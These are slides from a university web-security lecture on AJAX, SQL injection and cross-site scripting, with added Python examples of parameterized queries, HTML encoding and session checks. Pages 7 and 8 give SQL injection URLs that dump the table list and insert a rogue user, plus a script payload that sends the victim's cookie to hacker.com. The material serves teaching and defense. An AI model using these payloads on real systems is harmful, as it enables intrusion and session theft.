CSE 136 - Lecture 8 AJAX Presentation Layer Security Lab

Page 1: Day8

CSE 136 - Lecture 8

AJAX Presentation Layer Security Lab

Page 2: Day8

AJAX - what & why?

Asynchronous JavaScript and XML

Why? To avoid postback:
- saves page re-loading time
- transfers a smaller amount of data across the network (example: select year, make, model)
- improves performance

Page 3: Day8

AJAX - flow

Page 4: Day8

Ajax - postback vs callback

Page 5: Day8

Ajax - ASP.NET Ajax Architecture

Basic functionality - string manipulation, components, networking, and web services

Provides object-oriented techniques with JavaScript code

Page 6: Day8

Web Attack - Resource Enumeration

Common files: test.txt, back.zip, upload.zip, passwords.txt, users.txt, checkout.aspx.bak, checkout.asp.old

Common directories: /admin, /reports, /test, /upload, /temp, /include, /logs

Page 7: Day8

Web Attack - Parameter manipulation

/student/details/1000 - what if the user changes it to 1001?

SQL Injection:

query = "select product_name from product where product_id=" + PID

PID comes from a web parameter: http://myweb.com/product.aspx?PID=1

http://myweb.com/product.aspx?PID=1;union select name from sysobjects where xtype='U'

The hacker adds himself to the Users table:

http://myweb.com/product.aspx?PID=1; insert into Users (uname, pword) values ('hacker', 'hacked')
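The concatenated query on this slide, beside its parameterized fix, as an added Python example (not the lecture's own code, and not ASP.NET): an in-memory SQLite table stands in for the product table, `build_db` and the two lookup functions are constructed for the example. The vulnerable lookup treats whatever arrives in PID as SQL text; the hardened lookup rejects anything that is not an integer and binds the value as a parameter, so it is never parsed as SQL.

```python
import sqlite3


def build_db():
    # Constructed sample data standing in for the slide's product table.
    conn = sqlite3.connect(":memory:")
    conn.execute("create table product (product_id integer, product_name text)")
    conn.executemany(
        "insert into product values (?, ?)",
        [(1, "Widget"), (2, "Gadget"), (3, "Gizmo")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, pid):
    # The slide's pattern: the web parameter is glued onto the SQL text, so the
    # database engine parses whatever the client sent as part of the statement.
    query = "select product_name from product where product_id=" + pid
    return [row[0] for row in conn.execute(query)]


def lookup_parameterized(conn, pid):
    # Hardened form: validate the type first, then pass the value separately from
    # the SQL text. The driver binds it as a value; it can never change the query.
    if not pid.isdigit():
        raise ValueError("PID must be a positive integer")
    query = "select product_name from product where product_id=?"
    return [row[0] for row in conn.execute(query, (int(pid),))]


if __name__ == "__main__":
    db = build_db()
    print(lookup_vulnerable(db, "1"))          # one row
    print(lookup_vulnerable(db, "1 or 1=1"))   # every row: the condition was rewritten
    print(lookup_parameterized(db, "1"))       # one row; "1 or 1=1" raises ValueError
```

The same split applies to the slide's union and insert payloads: with a bound parameter there is no statement boundary for them to reach, and the type check removes the whole class of non-numeric input before the database sees it.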

Page 8: Day8

Web Attack – cross site scripting (XSS)

Once you compromise the database, insert JavaScript into the table column product.description:

product.description = "<script>document.location='http://hacker.com/collector.html?cookie='+document.cookie</script>"

The hacker now knows your cookie when the content is rendered.

Danger of cross site scripting:
- the contents of the current document's cookie are sent off to hacker.com
- session IDs and authentication tokens are commonly stored in cookies
- JavaScript can log key strokes

Page 9: Day8

Web Attack - Prevention

- Remove all SQL injection code
- HTML-encode all data displayed, to prevent XSS
- Treat any input as a potential threat: the user can enter JavaScript in a textbox and textarea
- Use validation on the server (the user could disable JavaScript error checking in the browser)
- Encrypt cookies: user_id="100" // No; user_id="CQZJU-VQRQF-LAWFI-HGCPL-MTNTS-JYOPD-TIJYV-INMYJ-TVLLC-RWJOT-CTHAM-GJQHD"
- Upload files (email attachments, business documents): servers should run a virus checker on all uploaded files
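The "HTML-encode all data displayed" point, as an added Python example (not from the lecture, and not ASP.NET's `HtmlEncode`): `render_product` and `encode_for_html` are constructed for the example, the tainted description is a constructed sample of the payload the XSS slide describes, and hacker.example is a placeholder host. Encoding happens at the point of output, for every untrusted value, and in both contexts the page uses it, the attribute value and the element body.

```python
import html

# Constructed sample of a description an attacker has written into
# product.description, as on the XSS slide (hacker.example is a placeholder).
TAINTED_DESCRIPTION = (
    "<script>document.location='http://hacker.example/collector.html?cookie='"
    "+document.cookie</script>"
)


def encode_for_html(value):
    # Entity-encode the characters HTML can read as markup (< > &) and, with
    # quote=True, the attribute delimiters ' and ", so the value is shown as text.
    return html.escape(str(value), quote=True)


def render_product(name, description):
    # Every untrusted value is encoded where it is emitted: the name inside an
    # attribute (title="...") and the description inside the element body.
    return (
        f'<div class="product" title="{encode_for_html(name)}">'
        f"<p>{encode_for_html(description)}</p></div>"
    )


def survives_verbatim(rendered, untrusted):
    # Check used after rendering: an untrusted input that reappears unchanged in
    # the output is one the browser would interpret rather than display.
    return untrusted in rendered


if __name__ == "__main__":
    page = render_product('Acme "Pro" Widget', TAINTED_DESCRIPTION)
    print(page)
    print("raw script survived:", survives_verbatim(page, TAINTED_DESCRIPTION))
```

Encoding the stored value on output, rather than stripping it on input, keeps the check next to the context that needs it; the same description encoded for HTML would still need different treatment if it were ever placed inside a JavaScript string or a URL.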

Page 10: Day8

Web Attack and AJAX

The methods of a Web service are analogous to the form inputs of a Web application.

They are easy to find, easy to attack

WSDL is now open to public (example data often provided)

Page 11: Day8

Web Attack - Traditional vs AJAX

Traditional: these features are hidden from the user

AJAX & web services: each feature is now exposed to the public

Page 12: Day8

Web Attack - white vs. black

Traditional black box: filtered data at the web server (only the last 4 digits of the cc number)

Whitebox: unfiltered data from the business/service layer (shows the entire cc number); exposed BL domain model

Page 13: Day8

Web Attack - Ajax security mistakes

Traditional vs. Ajax service: the hacker bypasses the admin page and goes directly to the AJAX files to access the info.

Ajax service exposed to everyone.

Solution: use the web application's cookie at the web service.

Page 14: Day8

Web Attack - Securing Ajax server

- Install a validation filter
- Use regular expressions to validate input strings
- Use regular expressions to remove "attack" characters: < & \ / >, etc.
- Validate the user through cookies/sessions (web services)
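The validation filter and the cookie/session check from this slide, together with the previous slide's solution of checking the cookie at the web service itself and the prevention slide's opaque cookie value, as one added Python example (not the lecture's code, and not ASP.NET's validation or session machinery). `PATTERNS`, `validate`, `create_session`, `requires_session` and `get_models` are all constructed for the example; the request is a plain dict standing in for an HTTP request. It goes slightly beyond the slide in one respect: the regular expressions are allowlists of what each parameter may contain, rather than a list of "attack" characters to strip, because a strip list is never complete, and an allowlist paired with output encoding is the more robust combination.

```python
import re
import secrets
from functools import wraps

# Allowlist patterns for the parameters the AJAX service accepts (constructed for
# the slide's year/make/model example). A value must match its pattern in full.
PATTERNS = {
    "year": re.compile(r"(19|20)[0-9]{2}"),
    "make": re.compile(r"[A-Za-z][A-Za-z0-9 -]{0,29}"),
    "model": re.compile(r"[A-Za-z0-9][A-Za-z0-9 -]{0,39}"),
}


class ValidationError(ValueError):
    pass


def validate(params):
    # The validation filter: reject unknown parameter names and any value that is
    # not a string matching its allowlist; return only what passed.
    clean = {}
    for name, value in params.items():
        pattern = PATTERNS.get(name)
        if pattern is None or not isinstance(value, str) or not pattern.fullmatch(value):
            raise ValidationError(f"rejected parameter {name!r}")
        clean[name] = value
    return clean


# Server-side session store: opaque token -> user id. The cookie carries only the
# random token, never user_id=100 itself, so it cannot be guessed or edited.
SESSIONS = {}


def create_session(user_id):
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = user_id
    return token


def requires_session(handler):
    # Gate the AJAX service method on the session cookie at the service itself, so
    # calling the service directly, skipping the admin page, fails the same way.
    @wraps(handler)
    def wrapper(request):
        user_id = SESSIONS.get(request.get("cookie"))
        if user_id is None:
            return {"status": 401, "error": "not authenticated"}
        try:
            params = validate(request.get("params", {}))
        except ValidationError as err:
            return {"status": 400, "error": str(err)}
        return handler(user_id, params)
    return wrapper


@requires_session
def get_models(user_id, params):
    # Constructed service method; a real one would query the business layer with
    # the validated values only.
    return {"status": 200, "user": user_id, "query": params}


if __name__ == "__main__":
    token = create_session(100)
    print(get_models({"cookie": token, "params": {"year": "2009", "make": "Honda"}}))
    print(get_models({"params": {"year": "2009"}}))                      # 401: no cookie
    print(get_models({"cookie": token, "params": {"make": "<b>x</b>"}}))  # 400: fails allowlist
```

Because the decorator runs the session check before the validation filter, an unauthenticated caller learns nothing about which parameter names or patterns the service accepts.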

Page 15: Day8

Review question

- Is ajax synchronous or asynchronous?
- Why use ajax?
- Is the ajax architecture more secure or less?
- What is XSS?
- What is the difference between white box and black box?

Page 16: Day8

Your assignment

Complete your MVC project with test cases

Project due next Thursday

Page 17: Day8

Lab

Due: Grade your middle tier and test cases
